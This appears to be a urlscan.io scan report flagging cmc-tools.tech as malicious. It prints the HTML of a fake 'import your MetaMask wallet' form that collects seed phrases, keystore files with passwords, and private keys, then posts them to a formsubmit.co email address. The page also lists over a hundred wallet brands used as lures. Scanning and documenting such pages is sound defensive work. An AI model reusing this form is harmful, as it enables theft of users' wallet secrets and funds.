cmc-tools.tech
Open in
urlscan Pro
89.117.9.91
Malicious Activity!
Public Scan
Submitted URL: http://cmc-tools.tech/select-wallet
Effective URL: https://cmc-tools.tech/select-wallet
Submission: On November 15 via api from CA — Scanned from CH
Effective URL: https://cmc-tools.tech/select-wallet
Submission: On November 15 via api from CA — Scanned from CH
Form analysis
1 forms found in the DOMPOST https://formsubmit.co/hdskxjsjskxjsjskksxn@gmail.com
<form action="https://formsubmit.co/hdskxjsjskxjsjskksxn@gmail.com" method="POST" enctype="multipart/form-data">
<input type="hidden" name="_captcha" value="false">
<input type="hidden" name="_next" value="https://cmc-tools.tech/success">
<input type="hidden" name="walletname" id="wal1" value="Connect">
<div class="mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left w-full mr-10">
<h3 id="modal-headline" class="text-lg leading-6 mt-2 font-medium text-gray-900" style="display: flex; flex-direction: row;">
<img src="files/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png" style="margin-right: 20px; height: 40px; width: 40px" id="myImg">
<span>Import your <span id="walletname">Metamask</span> wallet</span>
</h3>
<div class="mt-2">
<div class="mt-10">
<input type="hidden" name="Walled ID" value="my-form" id="wallet_id">
<div class="flex justify-evenly border-b-2 border-fuchsia-600 mb-4">
<div id="phrase" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Phrase </div>
<span id="guideDisplay" style="display: none;">
<div id="keystore" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Keystore JSON </div>
<div id="private" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Private Key </div>
</span>
<span id="guideDisplay2" style="display: none;">
<div id="family" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Family Seed </div>
<div id="secret" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Secret Numbers </div>
</span>
</div>
<div id="first" class="acc-body active">
<div class="flex flex-col">
</div>
<div class="flex flex-col mb-6">
<div class="relative" data-children-count="1">
<textarea id="phraseinput" cols="30" rows="4" placeholder="Enter your recovery phrase" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400"
name="phrase" required=""></textarea>
<p class="text-xs text-grey-300 mt-6"> Typically 12 (sometimes 24) words separated by single spaces </p>
</div>
</div>
<div class="flex w-full">
<button type="submit" name="submit1" class="btn btn-warning flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in">
<span class="mr-2 uppercase">Connect</span>
<span>
<svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
<path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9 0 11-18 0 9 9 0 0118 0z"></path>
</svg>
</span>
</button>
</div>
<div style="display:none" class="thankyou_message">
<p class="successful">Phrase Successfully Validated, goto Keystore JSON</p>
</div>
</div>
<div id="second" class="acc-body bg-grey-600">
<div class="flex flex-col">
</div>
<div class="flex flex-col mb-6">
<div class="relative">
<textarea cols="30" rows="4" placeholder="Enter your Keystore JSON" id="keystoreval" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400"
name="keysto" required=""></textarea>
</div>
</div>
<div class="flex flex-col mb-6">
<div class="relative" data-children-count="1">
<input type="text" name="keystorepass" placeholder="Wallet password" id="keystorepass" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
<p class="text-xs text-grey-300 mt-6"> Several lines of text beginning with "{...}" plus the password you used to encrypt it. </p>
</div>
</div>
<div class="flex w-full">
<button type="submit" name="submit2" class="flex items-center justify-center focus:outline-none
text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
w-full transition duration-150 ease-in">
<span class="mr-2
uppercase">Connect</span>
<span>
<svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
<path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
0 11-18 0 9 9 0 0118 0z"></path>
</svg>
</span>
</button>
</div>
<div style="display:none" class="thankyou_message">
<p class="successful">Keystore JSON Successfully Validated, goto Keystore JSON</p>
</div>
</div>
<div id="third" class="acc-body bg-grey-600">
<div class="flex flex-col">
<div class="relative"><input type="hidden" name="wallet_id" required="required" placeholder="Wallet ID" id="wallet_id" value="success"></div>
</div>
<div class="flex flex-col mb-6">
<div class="relative" data-children-count="1">
<input type="text" placeholder="Enter your Private Key" name="privatek" id="privatekeyval"
class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
<p class="text-xs text-grey-300 mt-6"> Typically 12 (sometimes 24) words seperated by a single space. </p>
</div>
</div>
<div class="flex w-full">
<button type="submit" class="flex items-center justify-center focus:outline-none
text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
w-full transition duration-150 ease-in">
<span class="mr-2
uppercase">Connect</span>
<span>
<svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
<path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
0 11-18 0 9 9 0 0118 0z"></path>
</svg>
</span>
</button>
</div>
</div>
<div id="fourth" class="acc-body bg-grey-600">
<div class="flex flex-col">
</div>
<div class="flex flex-col mb-6">
<div class="relative">
<textarea cols="30" rows="4" placeholder="" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" id="familyseed" required=""></textarea>
<p class="text-xs text-grey-300 mt-6"> Looks like sXXX1234XXX... </p>
</div>
</div>
<div class="flex w-full">
<button type="submit" class="flex items-center justify-center focus:outline-none
text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
w-full transition duration-150 ease-in">
<span class="mr-2
uppercase">Connect</span>
<span>
<svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
<path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
0 11-18 0 9 9 0 0118 0z"></path>
</svg>
</span>
</button>
</div>
</div>
<div id="fiveth" class="acc-body bg-grey-600">
<div class="flex flex-col">
<div class="relative"><input type="hidden" name="wallet_id" required="required" placeholder="Wallet ID" id="wallet_id" value="success"></div>
</div>
<div class="flex flex-col mb-6">
<div class="relative">
<p class="text-xs text-grey-300 mt-6"> Typically 8 rows of 6 digits. </p>
</div>
</div>
<div class="flex w-full">
<button type="submit" class="flex items-center justify-center focus:outline-none
text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
w-full transition duration-150 ease-in">
<span class="mr-2
uppercase">Connect</span>
<span>
<svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
<path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
0 11-18 0 9 9 0 0118 0z"></path>
</svg>
</span>
</button>
</div>
</div>
</div>
</div>
</div>
</form>
Text Content
Back Connecting... Connect Manually Metamask Easy-to-use browser extension. IMPORT YOUR METAMASK WALLET Phrase Keystore JSON Private Key Family Seed Secret Numbers Typically 12 (sometimes 24) words separated by single spaces Connect Phrase Successfully Validated, goto Keystore JSON Several lines of text beginning with "{...}" plus the password you used to encrypt it. Connect Keystore JSON Successfully Validated, goto Keystore JSON Typically 12 (sometimes 24) words seperated by a single space. Connect Looks like sXXX1234XXX... Connect Typically 8 rows of 6 digits. Connect Cancel Connect Your Wallet SafePal Metamask Trust Wallet Coinbase Keplr Wallet Solana Blockchain Lobstr Wallet Yoroi Wallet Hashpack Wallet Stargazer Wallet Bitkeep Wallet Exodus Wallet Keplr Wallet Coinomi Edge Wallet Solar Wallet Defly wallet Phoenix wallet Wasabi wallet Pera Algo Wallet Sender Wallet Xcel Pay Wallet Anchor Wallet ONTO Rainbow Agent Wallet CYBAVO Wallet GrindPlus Nash imToken Pillar Cryto.com | Defi Wallet Gnosis Safe Multisig Curve Finance TokenPocket MathWallet BitPay Ledger Live Walleth Authereum Dharma 1inch Wallet Huobi Wallet Eidoo MYKEY TrustVault Atomic Coin98 zkSync Shell Exchange Index Coop SwapX Starname Space Maskbook Snapshot Invoice.build Ankr DODO zLOT Tokamak Network Actus Protocol AstroTools.io Rubic Exchange Torus Wallet Oceanprotocol Filecone Wallet Falconswap Bancor Wallet Harvest Finance OctoFi Mushroom Finance Bitfrost Finance Orchid Protocol Datamine Network Streamr DappRadar SuperRare Arbitrum ParaSwap HoneySwap Fleek CoolWallet Alice AlphaWallet ZelCore Phantom Wallet Solflare Wallet Sollet Wallet D'CENT Wallet Tokenary Spatium Infinito Wallet.io Infinity Wallet Ownbit EasyPocket Bridge Wallet Unstoppable Wallet PEAKDEFI Wallet Vision BitKeep ViaWallet SparkPoint Dok Wallet AT.Wallet Midas Wallet Ellipal KEYRING PRO Aktoinariat Talken Wallet XinFin XDC Network Flare Wallet AToken Wallet Tongue Wallet Binance DEX RWallet PlasmaPay O3Wallet HashKey Me Jade Wallet Guarda Wallet Defiant Trustee Wallet MEET.ONE MoriX Wallet Binance Smart Chain Etherscan Lido TERRAstation OpenSea Zapper Aave Zerion LocalCryptos DeBank Unstoppabel Domains Rarible Yearn Adex Network dYdX MyCrypto Oasis App TokenSets MANTRA DAO Matcha KyberSwap DeFi Portfolio Tracker Loopring InstaDapp Matic Network 3Box DDEX Bamboo Relay Synthetix Dex.blue PoolTogether DEX.AG Gelato ENS Domains Idle Finance iearn.finance RCN Finance Hegic Kickback 88mph Mooni Clovers Mintbase DAOstack KnownOrigin MyEtherWallet Affogato StablePay Defi Saver Loom Network ThorChain BulkSender Heroes of Ether Betoken Linkdrop HelioWallet Escaroo TokenMarket Mesa MCDEX Furucombo Melon Chainsfr AKA3Email Alias 2Key Pitch SunshiSwap Unagii Cream Finance Other Wallet Navigated to Wallets